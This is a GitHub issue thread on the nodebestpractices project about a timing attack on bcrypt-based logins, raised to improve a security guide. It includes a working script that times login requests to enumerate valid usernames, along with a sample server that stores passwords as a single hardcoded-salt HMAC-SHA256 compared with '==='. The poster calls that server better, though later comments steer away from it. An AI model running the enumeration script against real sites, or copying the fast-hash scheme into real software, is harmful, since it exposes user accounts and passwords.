### ISSUE TITLE
6.8 Feasibility of time-based database brute-force attacks on websites

### ISSUE THREAD

**Issue by bmsdave** [goldbergyoni/nodebestpractices#325]
In the [recomendation](https://github.com/i0natan/nodebestpractices#-68-avoid-using-the-nodejs-crypto-library-for-handling-passwords-usebcrypt) 

> Avoid using the Node.js crypto library for handling passwords, use Bcrypt

Here is not mentioned the possibility of a timing attack if not handled properly bcrypt.

For example:
### server.js
```javascript
const express = require('express');
const bodyParser = require('body-parser');
const sql = require("sqlite3").verbose();
const bcrypt = require('bcrypt');

const initConn = (sqlite3) => {
    const conn = new sqlite3.Database('db/users.db', (err) => {
        if (err) {
            console.log('Could not connect to database', err)
        } else {
            console.log('Connected to database')
        }
    });
    return conn;
}

const initTable = (conn) => {
    conn.serialize(function () {
        conn.run("CREATE TABLE IF NOT EXISTS users (login TEXT NOT NULL UNIQUE, password TEXT NOT NULL)");
    });
}

const deleteUser = (db, login) => {
    db.serialize(() => {
        db.run(`DELETE FROM users WHERE login = $login;`, {
            $login: login
        })
    })
}

const createUser = (db, login, password) => {
    db.serialize(() => {
        db.run(`INSERT INTO users (login, password) VALUES ($login, $password);`, {
            $login: login,
            $password: password
        })
    })
}

const conn = initConn(sql);
initTable(conn);

// asynchronously generate a secure password using 10 hashing rounds
bcrypt.hash("whatthefoxsay", 10, function (err, hash) {
    // Store secure hash in user record
    deleteUser(conn, 'v7')
    createUser(conn, 'v7', hash)
});

const app = express();
app.use(bodyParser.json());

app.post('/api/v1/login', (req, res) => {
    conn.all(`
        SELECT rowid AS id, login, password
           FROM users
            WHERE login = $login
        `, {
            $login: req.body.login
        },
        function (err, rows) {
            if (err) {
                res.send(err.message);
            } else {
                let loginFlag = false
                if (rows && rows.length > 0) {
                    // compare a provided password input with saved hash
                    bcrypt.compare(req.body.password, rows[0].password, function (err, match) {
                        res.send(match ? 'logged in' : 'bad news');
                    });
                } else {
                    res.send(loginFlag ? 'logged in' : 'bad news');
                }
            }
        })
})

app.listen(3030, () => {
    console.log('start');
})
```

### attacker.js
```javascript
const request = require('request');

const sendRequest = function (login, password) {
    const result = {
        login,
        password
    }
    const promise = new Promise(function (res, rej) {
        result.start = Date.now(),
            request.post(
                'http://127.0.0.1:3030/api/v1/login',
                { json: { login, password } },
                function (error, response, body) {
                    if (!error && response.statusCode == 200) {
                        result.end = Date.now();
                        res(result);
                    }
                }
            );
    })
    return promise;
}

function makePassword(length) {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  
    for (var i = 0; i < length; i++)
      text += possible.charAt(Math.floor(Math.random() * possible.length));
  
    return text;
  }

const run = async () => {
    const responseArray = []
    for (let i = 0; i < 20; i++) {
        const res = await sendRequest((i % 2 === 0) ? "v7" : "v7_wrong", makePassword(8))
        responseArray.push(res);
    }
    return responseArray
}

run().then((responseArray) => {
    responseArray.map((response) => {
        console.log(response.login, response.end - response.start)
    })
})
```

If we run the server.js and the attacker.js, we'll get:
```
$ node ./attacker.js 
v7 89
v7_wrong 3
v7 74
v7_wrong 2
v7 74
v7_wrong 2
v7 75
v7_wrong 2
v7 75
v7_wrong 1
v7 75
v7_wrong 2
v7 74
v7_wrong 1
v7 75
v7_wrong 2
v7 75
v7_wrong 2
v7 76
v7_wrong 2
```

That allows us to brute force to know the logins that are in the database.

Crypto module behaves much better in this case.

If we change server like this:

### server_with_crypto.js
```javascript
const express = require('express');
const bodyParser = require('body-parser');
const sql = require("sqlite3").verbose();
const bcrypt = require('bcrypt');

const initConn = (sqlite3) => {
    const conn = new sqlite3.Database('db/users.db', (err) => {
        if (err) {
            console.log('Could not connect to database', err)
        } else {
            console.log('Connected to database')
        }
    });
    return conn;
}

const initTable = (conn) => {
    conn.serialize(function () {
        conn.run("CREATE TABLE IF NOT EXISTS users (login TEXT NOT NULL UNIQUE, password TEXT NOT NULL)");
    });
}

const deleteUser = (db, login) => {
    db.serialize(() => {
        db.run(`DELETE FROM users WHERE login = $login;`, {
            $login: login
        })
    })
}

const createUser = (db, login, password) => {
    db.serialize(() => {
        db.run(`INSERT INTO users (login, password) VALUES ($login, $password);`, {
            $login: login,
            $password: password
        })
    })
}

const conn = initConn(sql);
initTable(conn);

const crypto = require('crypto');
const getFuncSHA256Salt = (salt) => {
    return (password) => {
        var hash = crypto.createHmac('sha256', salt);
        hash.update(password);
        var value = hash.digest('hex');
        return value;
    }
};
const cryptoSHA256Salt = getFuncSHA256Salt("HVHSNrRWpP1ZSR4bnjXpiHCS1ENYcUuHO")

deleteUser(conn, 'v7')
createUser(conn, 'v7', cryptoSHA256Salt("whatthefoxsay"))

const app = express();
app.use(bodyParser.json());

app.post('/api/v1/login', (req, res) => {
    conn.all(`
        SELECT rowid AS id, login, password
           FROM users
            WHERE login = $login
        `, {
            $login: req.body.login
        },
        function (err, rows) {
            if (err) {
                res.send(err.message);
            } else {
                let loginFlag = false
                if (rows && rows.length > 0) {
                    res.send( (cryptoSHA256Salt(req.body.password) === rows[0].password) ? 'logged in' : 'bad news' )
                } else {
                    res.send(loginFlag ? 'logged in' : 'bad news');
                }
            }
        })
})

app.listen(3030, () => {
    console.log('start');
})
```

We'll get:
```
$ node ./attacker.js 
v7 16
v7_wrong 3
v7 2
v7_wrong 2
v7 2
v7_wrong 2
v7 2
v7_wrong 2
v7 2
v7_wrong 2
v7 1
v7_wrong 1
v7 2
v7_wrong 2
v7 2
v7_wrong 1
v7 2
v7_wrong 2
v7 1
v7_wrong 1
```

# summary:
I believe it is important to mention this point and bring good practice of using bcrypt in authentication, since it is cited as the best alternative to crypto

**Comment by bmsdave** [comment]
@lirantal and @ryzokuken
What do you think about this?

**Comment by bmsdave** [comment]
In addition, I think we should use the standard node.js libraries.
if we think bcrypt is better, why don't we suggest changes to crypto.js, so we can use it?

**Comment by ryzokuken** [comment]
I think using `scrypt` is a more secure option for password-based key derivation than using an HMAC but the suggestion stands: use the core module, it's always more secure than userland (if it isn't, let us know on the issue tracker 😉).

**Comment by i0natan** [comment]
@bmsdave Welcome aboard.

Interesting and challenging topic, I remember when we wrote this piece of advice we checked the recommendations of most security institute and picked bcrypt not because he was the most secured one rather becuase he one top 3 in all list and the most popular one with very mature and maintained implementation.

To what 'crypto' algo do you refer specifically as an alternative?

@js-kyle Do you to handle this, me, together?

**Comment by alinaugustin** [comment]
I am sorry but this is not a room chat.

**Comment by i0natan** [comment]
@ryzokuken Got it, I frankly need to go through some docs to intelligently comment on this, will share my view in few days

@bmsdave Welcome aboard. I suggest that we first discuss here and have a consent about the right recommendation. Then it could be great to have your PR. Do you have any specific view on this topic or basically agree with @ryzokuken ?

**Comment by lirantal** [comment]
@bmsdave welcome and appreciate your input on this.
that example doesn't show any weakness in bcrypt but rather the logic flow of the app being perhaps the culprit. bcrypt as an algorithm has been battle tested for the past 20 years and is considered safe (until proven otherwise).

With that said, choosing scrypt over bcrypt for the sake of being API-complete with the built-ins in Node.js is a good discussiont o have. The crypto WG has been working quite a bit on improvements in that area and we can check into considering if that's a good advise now-days or not, but where-as bcrypt is a native module we can build into older Node.js version, choosing scrypt might mean that we are excluding users of older Node.js versions.

**Comment by ryzokuken** [comment]
@lirantal exactly my point. I keep scrypt over bcrypt just for the sake of keeping close to the core module, since AFAIK, there's no theoretical weakness in bcrypt.

> we are excluding users of older Node.js versions.

Fair point, but since it was a semver-minor, IMO it must have landed on all currently supported versions for Node.js?

**Comment by i0natan** [comment]
Thank you all for participating in this interesting discussion.

Frankly, my cryptographic understanding is not deep enough to technically vote for one or another. Both scrypt, bcrypt and argon seem to be recommended by reputable groups and the weaknesses of each seem like nitty-gritty corner cases that matter in a specific context.  I also don't see a strong reason to favor one over the others because it's built-in - well-maintained packages (like bcrypt) can hold high standards like the node core and relying on 3rd party code (99%?) is the reality for most Node apps. Another reason not to recommend a single winner is compliance - US enterprises for examples are often obligated to conform to FIPS/NIST recommendation which is currently PBKDF2.

Given that, I suggest recommending two or four based on the user context. [Pasting from OWASP's recommendation though I would edit the text a bit to comply with the Node's eco-system:](https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet)

> Argon2[*7] is the winner of the password hashing competition and should be considered as your first choice for new applications;
> PBKDF2 [*4] when FIPS certification or enterprise support on many platforms is required;
> scrypt [*5] where resisting any/all hardware accelerated attacks is necessary but support isn’t.
> bcrypt where PBKDF2 or scrypt support is not available.

**Comment by ryzokuken** [comment]
FWIW, PBKDF2 is also exposed via the crypto module, further strengthening my case. 

> relying on 3rd party code (99%?) is the reality for most Node apps

While what you say is very true, I'd like to make a special case for cryptography. I don't think it's a great practice to rely on third-party code so much for cryptography, especially in light of the recent controversy surrounding the security (or the lack thereof) of the ecosystem.

**Comment by lirantal** [comment]
Please please, I want to urge you to not try and dabble in adventures regarding security "bleeding edge" features, or making choices for the wrong reasons (compatible with Node.js apis). This is exactly the place where you don't want to be creative :-)

I'll point out some references to put some context into this discussion:
* PHP (since version 5.5.0) has bcrypt set as the default password hashing algorithm. Before you dismiss PHP in flame wars and language battles, remember that PHP has been "around the block" longer than Node.js has.
* There has been some discussion started already on how to improve Node.js's crypto and password hashing APIs (see https://github.com/nodejs/node/issues/21766) which still awaits work and discusses how current hashing APIs can be *easily* used in the wrong way.
* To give an example of why this is not a straight-forward thing to tackle - @i0natan mentioned argon2 as a winner of some contest and first on the list of OWASP, but the argon2 algorithm has actually several different variations but do you know which one exactly is optimal for use-cases such as key-derivation functions? I may be wrong but I assume most people on this thread atm does not, and even if you did, how could we maintain safe APIs so that prior education won't be a requirement?

This is not to say that one algorithm is superior over another. For example, argon2 may be the modern alternative to replace others that have been mentioned on this thread, but rather to say that I wouldn't drop everything and rush myself to use it just because it's "modern", or because it won a competition.

TL;DR For the time being and until we learn of better reasons to adopt other password hashing functions I'd keep using bcrypt which has been battle-tested for 2 decades now with no known vulnerabilities, or PBKDF if needed for compliance reasons.

**Comment by ryzokuken** [comment]
> There has been some discussion started already on how to improve Node.js's crypto and password hashing APIs (see nodejs/node#21766) which still awaits work and discusses how current hashing APIs can be easily used in the wrong way.

❤️ that you pointed that out. I'm tackling all similar problems right now with https://github.com/ryzokuken/easy-crypto.

**Comment by i0natan** [comment]
@lirantal Great explanation. Based on all the feedback here, it seems that both bcrypt, scrypt and PBKDF are reputable enough to be recommended. If no obligations, I'll PR the change (or if anyone else here like to - please do)

**Comment by ryzokuken** [comment]
@i0natan +1. Perhaps @bmsdave would like to make the change?

Thanks @lirantal for your expertise and @bmsdave for taking the initiative.

**Comment by i0natan** [comment]
> @i0natan if possible, I'd like to prepare a PR for this weekend. 

That would be our honor. Just glimpse through our [content writing guideliness before](https://github.com/i0natan/nodebestpractices/blob/master/.operations/writing-guidelines.md)

**Comment by josh-hemphill** [comment]
Anyone create the PR yet? I'd be happy to put something together, just want to make sure no one is already working on it.

**Comment by ryzokuken** [comment]
@josh-hemphill please go for it!
